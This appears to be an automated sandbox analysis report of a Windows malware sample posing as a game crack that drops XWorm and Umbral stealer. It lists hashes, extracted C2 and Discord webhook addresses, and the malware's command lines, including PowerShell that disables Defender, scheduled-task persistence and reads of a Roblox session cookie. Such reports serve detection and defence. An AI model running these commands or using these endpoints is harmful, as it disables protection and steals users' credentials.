Analysis
-
max time kernel
14s -
max time network
11s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
27-12-2024 17:46
Static task
static1
Behavioral task
behavioral1
Sample
3a8311c1bffc4aa452ac99de43e4c52f33749385cb788ab783e8efd35306ba54.exe
Resource
win7-20240903-en
General
-
Target
3a8311c1bffc4aa452ac99de43e4c52f33749385cb788ab783e8efd35306ba54.exe
-
Size
144KB
-
MD5
9e092ddaae5a606aa7562aefa6d19193
-
SHA1
f89629fc9325aa4e18563b9fb37d9b01e404e954
-
SHA256
3a8311c1bffc4aa452ac99de43e4c52f33749385cb788ab783e8efd35306ba54
-
SHA512
477a5cace00bb9fe1322f80f73b4f55da96ca8b43fbb735853568c406358ea47d68f575eadff34d878ba58d576129e6f007d661138e8d43bd703c201e7aee382
-
SSDEEP
3072:ICjy4wEgSRZg6tYJbpVOfraR+wS8WurzkMXEe99:nwhmOCYJb/EraRVS8l59
Malware Config
Extracted
xworm
127.0.0.1:46732
listing-repository.gl.at.ply.gg:46732
-
Install_directory
%Userprofile%
-
install_file
svchost.exe
Extracted
umbral
https://discord.com/api/webhooks/1321219981534298203/2bX3Cg6xbwKu45g5JAiVdKvMjVgYAyc-dGKLvybGhQzK_1h1Jt7szxeJv6nKrIMpNnXN
Signatures
-
Detect Umbral payload 2 IoCs
resource yara_rule behavioral1/files/0x00120000000054a9-19.dat family_umbral behavioral1/memory/2828-21-0x0000000000970000-0x00000000009B0000-memory.dmp family_umbral -
Detect Xworm Payload 2 IoCs
resource yara_rule behavioral1/files/0x0008000000016d42-6.dat family_xworm behavioral1/memory/3016-8-0x0000000000CB0000-0x0000000000CC8000-memory.dmp family_xworm -
Umbral family
-
Xworm family
-
pid Process 1968 powershell.exe 1712 powershell.exe 768 powershell.exe 2384 powershell.exe 2196 powershell.exe 1084 powershell.exe 2448 powershell.exe 2268 powershell.exe 996 powershell.exe -
Drops startup file 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnk FatalityCrack.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnk FatalityCrack.exe -
Executes dropped EXE 2 IoCs
pid Process 3016 FatalityCrack.exe 2828 FatalityCrаck.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Adds Run key to start application 2 TTPs 2 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Windows\CurrentVersion\Run\FatalityCrаck = "C:\\Users\\Admin\\AppData\\Local\\Temp\\FatalityCrаck.exe" 3a8311c1bffc4aa452ac99de43e4c52f33749385cb788ab783e8efd35306ba54.exe Set value (str) \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Windows\CurrentVersion\Run\svchost = "C:\\Users\\Admin\\svchost.exe" FatalityCrack.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 11 discord.com 12 discord.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 7 ip-api.com -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 320 PING.EXE 2372 cmd.exe -
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 2260 wmic.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 320 PING.EXE -
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2804 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 12 IoCs
pid Process 2268 powershell.exe 2828 FatalityCrаck.exe 996 powershell.exe 1968 powershell.exe 2384 powershell.exe 1712 powershell.exe 2564 powershell.exe 2196 powershell.exe 1084 powershell.exe 2448 powershell.exe 768 powershell.exe 3016 FatalityCrack.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 3016 FatalityCrack.exe Token: SeDebugPrivilege 2268 powershell.exe Token: SeDebugPrivilege 2828 FatalityCrаck.exe Token: SeIncreaseQuotaPrivilege 2728 wmic.exe Token: SeSecurityPrivilege 2728 wmic.exe Token: SeTakeOwnershipPrivilege 2728 wmic.exe Token: SeLoadDriverPrivilege 2728 wmic.exe Token: SeSystemProfilePrivilege 2728 wmic.exe Token: SeSystemtimePrivilege 2728 wmic.exe Token: SeProfSingleProcessPrivilege 2728 wmic.exe Token: SeIncBasePriorityPrivilege 2728 wmic.exe Token: SeCreatePagefilePrivilege 2728 wmic.exe Token: SeBackupPrivilege 2728 wmic.exe Token: SeRestorePrivilege 2728 wmic.exe Token: SeShutdownPrivilege 2728 wmic.exe Token: SeDebugPrivilege 2728 wmic.exe Token: SeSystemEnvironmentPrivilege 2728 wmic.exe Token: SeRemoteShutdownPrivilege 2728 wmic.exe Token: SeUndockPrivilege 2728 wmic.exe Token: SeManageVolumePrivilege 2728 wmic.exe Token: 33 2728 wmic.exe Token: 34 2728 wmic.exe Token: 35 2728 wmic.exe Token: SeIncreaseQuotaPrivilege 2728 wmic.exe Token: SeSecurityPrivilege 2728 wmic.exe Token: SeTakeOwnershipPrivilege 2728 wmic.exe Token: SeLoadDriverPrivilege 2728 wmic.exe Token: SeSystemProfilePrivilege 2728 wmic.exe Token: SeSystemtimePrivilege 2728 wmic.exe Token: SeProfSingleProcessPrivilege 2728 wmic.exe Token: SeIncBasePriorityPrivilege 2728 wmic.exe Token: SeCreatePagefilePrivilege 2728 wmic.exe Token: SeBackupPrivilege 2728 wmic.exe Token: SeRestorePrivilege 2728 wmic.exe Token: SeShutdownPrivilege 2728 wmic.exe Token: SeDebugPrivilege 2728 wmic.exe Token: SeSystemEnvironmentPrivilege 2728 wmic.exe Token: SeRemoteShutdownPrivilege 2728 wmic.exe Token: SeUndockPrivilege 2728 wmic.exe Token: SeManageVolumePrivilege 2728 wmic.exe Token: 33 2728 wmic.exe Token: 34 2728 wmic.exe Token: 35 2728 wmic.exe Token: SeDebugPrivilege 996 powershell.exe Token: SeDebugPrivilege 1968 powershell.exe Token: SeDebugPrivilege 2384 powershell.exe Token: SeDebugPrivilege 1712 powershell.exe Token: SeDebugPrivilege 2564 powershell.exe Token: SeDebugPrivilege 2196 powershell.exe Token: SeDebugPrivilege 1084 powershell.exe Token: SeIncreaseQuotaPrivilege 920 wmic.exe Token: SeSecurityPrivilege 920 wmic.exe Token: SeTakeOwnershipPrivilege 920 wmic.exe Token: SeLoadDriverPrivilege 920 wmic.exe Token: SeSystemProfilePrivilege 920 wmic.exe Token: SeSystemtimePrivilege 920 wmic.exe Token: SeProfSingleProcessPrivilege 920 wmic.exe Token: SeIncBasePriorityPrivilege 920 wmic.exe Token: SeCreatePagefilePrivilege 920 wmic.exe Token: SeBackupPrivilege 920 wmic.exe Token: SeRestorePrivilege 920 wmic.exe Token: SeShutdownPrivilege 920 wmic.exe Token: SeDebugPrivilege 920 wmic.exe Token: SeSystemEnvironmentPrivilege 920 wmic.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 3016 FatalityCrack.exe -
Suspicious use of WriteProcessMemory 63 IoCs
description pid Process procid_target PID 2380 wrote to memory of 3016 2380 3a8311c1bffc4aa452ac99de43e4c52f33749385cb788ab783e8efd35306ba54.exe 31 PID 2380 wrote to memory of 3016 2380 3a8311c1bffc4aa452ac99de43e4c52f33749385cb788ab783e8efd35306ba54.exe 31 PID 2380 wrote to memory of 3016 2380 3a8311c1bffc4aa452ac99de43e4c52f33749385cb788ab783e8efd35306ba54.exe 31 PID 2380 wrote to memory of 2268 2380 3a8311c1bffc4aa452ac99de43e4c52f33749385cb788ab783e8efd35306ba54.exe 32 PID 2380 wrote to memory of 2268 2380 3a8311c1bffc4aa452ac99de43e4c52f33749385cb788ab783e8efd35306ba54.exe 32 PID 2380 wrote to memory of 2268 2380 3a8311c1bffc4aa452ac99de43e4c52f33749385cb788ab783e8efd35306ba54.exe 32 PID 2380 wrote to memory of 2828 2380 3a8311c1bffc4aa452ac99de43e4c52f33749385cb788ab783e8efd35306ba54.exe 34 PID 2380 wrote to memory of 2828 2380 3a8311c1bffc4aa452ac99de43e4c52f33749385cb788ab783e8efd35306ba54.exe 34 PID 2380 wrote to memory of 2828 2380 3a8311c1bffc4aa452ac99de43e4c52f33749385cb788ab783e8efd35306ba54.exe 34 PID 2828 wrote to memory of 2728 2828 FatalityCrаck.exe 36 PID 2828 wrote to memory of 2728 2828 FatalityCrаck.exe 36 PID 2828 wrote to memory of 2728 2828 FatalityCrаck.exe 36 PID 2828 wrote to memory of 2600 2828 FatalityCrаck.exe 38 PID 2828 wrote to memory of 2600 2828 FatalityCrаck.exe 38 PID 2828 wrote to memory of 2600 2828 FatalityCrаck.exe 38 PID 2828 wrote to memory of 996 2828 FatalityCrаck.exe 40 PID 2828 wrote to memory of 996 2828 FatalityCrаck.exe 40 PID 2828 wrote to memory of 996 2828 FatalityCrаck.exe 40 PID 2828 wrote to memory of 1968 2828 FatalityCrаck.exe 42 PID 2828 wrote to memory of 1968 2828 FatalityCrаck.exe 42 PID 2828 wrote to memory of 1968 2828 FatalityCrаck.exe 42 PID 3016 wrote to memory of 2384 3016 FatalityCrack.exe 44 PID 3016 wrote to memory of 2384 3016 FatalityCrack.exe 44 PID 3016 wrote to memory of 2384 3016 FatalityCrack.exe 44 PID 2828 wrote to memory of 1712 2828 FatalityCrаck.exe 46 PID 2828 wrote to memory of 1712 2828 FatalityCrаck.exe 46 PID 2828 wrote to memory of 1712 2828 FatalityCrаck.exe 46 PID 2828 wrote to memory of 2564 2828 FatalityCrаck.exe 48 PID 2828 wrote to memory of 2564 2828 FatalityCrаck.exe 48 PID 2828 wrote to memory of 2564 2828 FatalityCrаck.exe 48 PID 3016 wrote to memory of 2196 3016 FatalityCrack.exe 50 PID 3016 wrote to memory of 2196 3016 FatalityCrack.exe 50 PID 3016 wrote to memory of 2196 3016 FatalityCrack.exe 50 PID 3016 wrote to memory of 1084 3016 FatalityCrack.exe 52 PID 3016 wrote to memory of 1084 3016 FatalityCrack.exe 52 PID 3016 wrote to memory of 1084 3016 FatalityCrack.exe 52 PID 2828 wrote to memory of 920 2828 FatalityCrаck.exe 54 PID 2828 wrote to memory of 920 2828 FatalityCrаck.exe 54 PID 2828 wrote to memory of 920 2828 FatalityCrаck.exe 54 PID 2828 wrote to memory of 1632 2828 FatalityCrаck.exe 56 PID 2828 wrote to memory of 1632 2828 FatalityCrаck.exe 56 PID 2828 wrote to memory of 1632 2828 FatalityCrаck.exe 56 PID 3016 wrote to memory of 2448 3016 FatalityCrack.exe 58 PID 3016 wrote to memory of 2448 3016 FatalityCrack.exe 58 PID 3016 wrote to memory of 2448 3016 FatalityCrack.exe 58 PID 2828 wrote to memory of 2132 2828 FatalityCrаck.exe 60 PID 2828 wrote to memory of 2132 2828 FatalityCrаck.exe 60 PID 2828 wrote to memory of 2132 2828 FatalityCrаck.exe 60 PID 2828 wrote to memory of 768 2828 FatalityCrаck.exe 62 PID 2828 wrote to memory of 768 2828 FatalityCrаck.exe 62 PID 2828 wrote to memory of 768 2828 FatalityCrаck.exe 62 PID 2828 wrote to memory of 2260 2828 FatalityCrаck.exe 64 PID 2828 wrote to memory of 2260 2828 FatalityCrаck.exe 64 PID 2828 wrote to memory of 2260 2828 FatalityCrаck.exe 64 PID 2828 wrote to memory of 2372 2828 FatalityCrаck.exe 66 PID 2828 wrote to memory of 2372 2828 FatalityCrаck.exe 66 PID 2828 wrote to memory of 2372 2828 FatalityCrаck.exe 66 PID 2372 wrote to memory of 320 2372 cmd.exe 68 PID 2372 wrote to memory of 320 2372 cmd.exe 68 PID 2372 wrote to memory of 320 2372 cmd.exe 68 PID 3016 wrote to memory of 2804 3016 FatalityCrack.exe 69 PID 3016 wrote to memory of 2804 3016 FatalityCrack.exe 69 PID 3016 wrote to memory of 2804 3016 FatalityCrack.exe 69 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Views/modifies file attributes 1 TTPs 1 IoCs
pid Process 2600 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\3a8311c1bffc4aa452ac99de43e4c52f33749385cb788ab783e8efd35306ba54.exe"C:\Users\Admin\AppData\Local\Temp\3a8311c1bffc4aa452ac99de43e4c52f33749385cb788ab783e8efd35306ba54.exe"1⤵
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:2380 -
C:\Users\Admin\AppData\Local\Temp\FatalityCrack.exe"C:\Users\Admin\AppData\Local\Temp\FatalityCrack.exe"2⤵
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3016 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\FatalityCrack.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2384
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'FatalityCrack.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2196
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\svchost.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1084
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:2448
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\Admin\svchost.exe"3⤵
- Scheduled Task/Job: Scheduled Task
PID:2804
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\FatalityCrаck.exe'2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2268
-
-
C:\Users\Admin\AppData\Local\Temp\FatalityCrаck.exe"C:\Users\Admin\AppData\Local\Temp\FatalityCrаck.exe"2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2828 -
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2728
-
-
C:\Windows\system32\attrib.exe"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\FatalityCrаck.exe"3⤵
- Views/modifies file attributes
PID:2600
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\FatalityCrаck.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:996
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 23⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1968
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1712
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2564
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" os get Caption3⤵
- Suspicious use of AdjustPrivilegeToken
PID:920
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" computersystem get totalphysicalmemory3⤵PID:1632
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid3⤵PID:2132
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:768
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic" path win32_VideoController get name3⤵
- Detects videocard installed
PID:2260
-
-
C:\Windows\system32\cmd.exe"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\FatalityCrаck.exe" && pause3⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Suspicious use of WriteProcessMemory
PID:2372 -
C:\Windows\system32\PING.EXEping localhost4⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:320
-
-
-
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Scheduled Task
1Defense Evasion
Hide Artifacts
1Hidden Files and Directories
1Modify Registry
1Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
1Credentials In Files
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
68KB
MD539e5154434df5aa11e9f0c65cd4f144f
SHA1834ec83adc2234cbcd70efbb983891cc72259ddd
SHA2563c2fdf6082ef589e943918ff25b7fe96e2e741464711dabab2d31a33e4b1e255
SHA512f5c579a374b0898fdc6b4be7aeea110a18d1138a2d8ab4e9595f341e8258c5a35cd018048dc90ebb640f2ddd5d2be3b26f1caceb92a17124ce0c69719340db0f
-
Filesize
231KB
MD5ae57a759dd91e36e11de032c61698600
SHA1f96c5f318f439fabc012f1746a564c383fa41878
SHA256f1ea81371987e6e74a79f623bcc16262efd6151a352d491ba668c706df8d3456
SHA51226112e2bdb0884f6e781ba6e1e8e871aaecfbdc9ee80f156aacc6622c32b1c2069e66311f8ca458e34454c787f05ed463a2548d7a7bc05735d1a6f5bb524d295
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5a103f2a047bb4552e5aaae5919921807
SHA14c1bbcc8eaac7c11fe9c0bce475921f2a9ec52d5
SHA256dade9e2d0faae2600bf8eed014cb91d954f7f070093581708e9d61a9281d3cce
SHA5122fea7eb1f3623165a7f29531b3f6d44653ff4ef65d7a9c12ce850f7148612bc5fe80e6851228fffa552943cb7828e5cfda852c3e15f60895994bd853185fe2c4